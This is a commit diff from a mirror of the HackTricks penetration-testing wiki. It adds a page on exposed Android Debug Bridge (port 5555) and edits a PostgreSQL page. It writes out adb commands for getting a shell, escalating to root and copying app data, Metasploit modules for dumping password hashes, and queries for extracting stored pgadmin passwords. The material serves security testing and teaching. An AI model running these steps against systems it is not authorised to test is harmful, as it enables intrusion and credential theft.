Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-15 01:17:36 +00:00
Code Issues Projects Releases Packages Wiki Activity

GitBook: [#2838] adb svc

Browse source
This commit is contained in:
CPol 2021-11-12 01:11:08 +00:00 committed by gitbook-bot
parent 1b6c914d27
commit 1524a08546
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
3 changed files with 51 additions and 10 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

1
SUMMARY.md
View file

@ -332,6 +332,7 @@
* [5000 - Pentesting Docker Registry](pentesting/5000-pentesting-docker-registry.md)
* [5353/UDP Multicast DNS (mDNS)](pentesting/5353-udp-multicast-dns-mdns.md)
* [5432,5433 - Pentesting Postgresql](pentesting/pentesting-postgresql.md)
* [5555 - Android Debug Bridge](pentesting/5555-android-debug-bridge.md)
* [5601 - Pentesting Kibana](pentesting/5601-pentesting-kibana.md)
* [5671,5672 - Pentesting AMQP](pentesting/5671-5672-pentesting-amqp.md)
* [5800,5801,5900,5901 - Pentesting VNC](pentesting/pentesting-vnc.md)

41
pentesting/5555-android-debug-bridge.md Normal file
View file

@ -0,0 +1,41 @@
# 5555 - Android Debug Bridge
## Basic Information
**Android Debug Bridge** (adb) is a versatile command-line tool that lets you communicate with a device. The adb command facilitates a variety of device actions, such as i**nstalling and debugging apps**, and it provides **access to a Unix shell** that you can use to run a variety of commands on a device. (from [here](https://developer.android.com/studio/command-line/adb))
**Default port**: 5555.
```
PORT STATE SERVICE VERSION
5555/tcp open adb Android Debug Bridge device (name: msm8909; model: N3; device: msm8909)
```
## Connect
If find the ADB service running in a port of a device and you can connect to it, **you can get a shell inside the system:**
```bash
adb connect 10.10.10.10
adb root # Try to escalate to root
adb shell
```
For more ADB commands check the following page:
{% content-ref url="../mobile-apps-pentesting/android-app-pentesting/adb-commands.md" %}
[adb-commands.md](../mobile-apps-pentesting/android-app-pentesting/adb-commands.md)
{% endcontent-ref %}
### Dump App data
In order to completely download the data of an application you can:
```bash
# From a root console
chmod 777 /data/data/com.package
cp -r /data/data/com.package /sdcard Note: Using ADB attacker cannot obtain data directly by using command " adb pull /data/data/com.package". He is compulsorily required to move data to Internal storage and then he can pull that data.
adb pull "/sdcard/com.package"
```
You can use this trick to **retrieve sensitive information like chrome passwords**. For more info about this check the information a references provided [**here**](https://github.com/carlospolop/hacktricks/issues/274).

19
pentesting/pentesting-postgresql.md
View file

@ -4,9 +4,9 @@
**PostgreSQL** is an _\*\*_open source object-relational database system that uses and extends the SQL language.
**Default port:** 5432, and if this port is already in use it seems that postgresql will use the next port \(5433 probably\) which is not in use.
**Default port:** 5432, and if this port is already in use it seems that postgresql will use the next port (5433 probably) which is not in use.
```text
```
PORT STATE SERVICE
5432/tcp open pgsql
```
@ -74,23 +74,23 @@ ORDER BY 1;
## Enumeration
```text
```
msf> use auxiliary/scanner/postgres/postgres_version
msf> use auxiliary/scanner/postgres/postgres_dbname_flag_injection
```
### \*\*\*\*[**Brute force**](../brute-force.md#postgresql)
### [**Brute force**](../brute-force.md#postgresql)
Client authentication is controlled by a config file frequently named _**pg\_hba.conf**_. This file has a set of records. A record may have one of the following seven formats:
![](https://lh4.googleusercontent.com/Ff8YbD3ppYmN2Omp-4M-0AAVhLsr4c2i7d7HUjgkE-O6NZ5zbaST1hdMPrp1AL_xTXJalYe0HYxUk76vWJUfHZ5GuCDvIL1A-sMV44Z0CYSVgLM9ttFTDu-BhzewBGc7FeMarTLqsu_N1ztXJg)
![](https://lh4.googleusercontent.com/Ff8YbD3ppYmN2Omp-4M-0AAVhLsr4c2i7d7HUjgkE-O6NZ5zbaST1hdMPrp1AL\_xTXJalYe0HYxUk76vWJUfHZ5GuCDvIL1A-sMV44Z0CYSVgLM9ttFTDu-BhzewBGc7FeMarTLqsu\_N1ztXJg)
**Each** record **specifies** a **connection type**, a **client IP address range** \(if relevant for the connection type\), a **database name**, a **user name**, and the **authentication method** to be used for connections matching these parameters. The **first record with a match**ing connection type, client address, requested database, and user name **is used** to perform authentication. There is no "fall-through" or "backup": **if one record is chosen and the authentication fails, subsequent records are not considered**. If no record matches, access is denied.
**Each** record **specifies** a **connection type**, a **client IP address range** (if relevant for the connection type), a **database name**, a **user name**, and the **authentication method** to be used for connections matching these parameters. The **first record with a match**ing connection type, client address, requested database, and user name **is used** to perform authentication. There is no "fall-through" or "backup": **if one record is chosen and the authentication fails, subsequent records are not considered**. If no record matches, access is denied.\
The **password-based** authentication methods are **md5**, **crypt**, and **password**. These methods operate similarly except for the way that the password is sent across the connection: respectively, MD5-hashed, crypt-encrypted, and clear-text. A limitation is that the crypt method does not work with passwords that have been encrypted in pg\_authid.
## **POST**
```text
```
msf> use auxiliary/scanner/postgres/postgres_hashdump
msf> use auxiliary/scanner/postgres/postgres_schemadump
msf> use auxiliary/admin/postgres/postgres_readfile
@ -115,8 +115,8 @@ Then, **restart the service**.
### pgadmin
[pgadmin](https://www.pgadmin.org/) is an administration and development platform for PostgreSQL.
You can find **passwords** inside the _**pgadmin4.db**_ file
[pgadmin](https://www.pgadmin.org) is an administration and development platform for PostgreSQL.\
You can find **passwords** inside the _**pgadmin4.db**_ file\
You can decrypt them using the _**decrypt**_ function inside the script: [https://github.com/postgres/pgadmin4/blob/master/web/pgadmin/utils/crypto.py](https://github.com/postgres/pgadmin4/blob/master/web/pgadmin/utils/crypto.py)
```bash
@ -125,4 +125,3 @@ sqlite3 pgadmin4.db "select * from user;"
sqlite3 pgadmin4.db "select * from server;"
string pgadmin4.db
```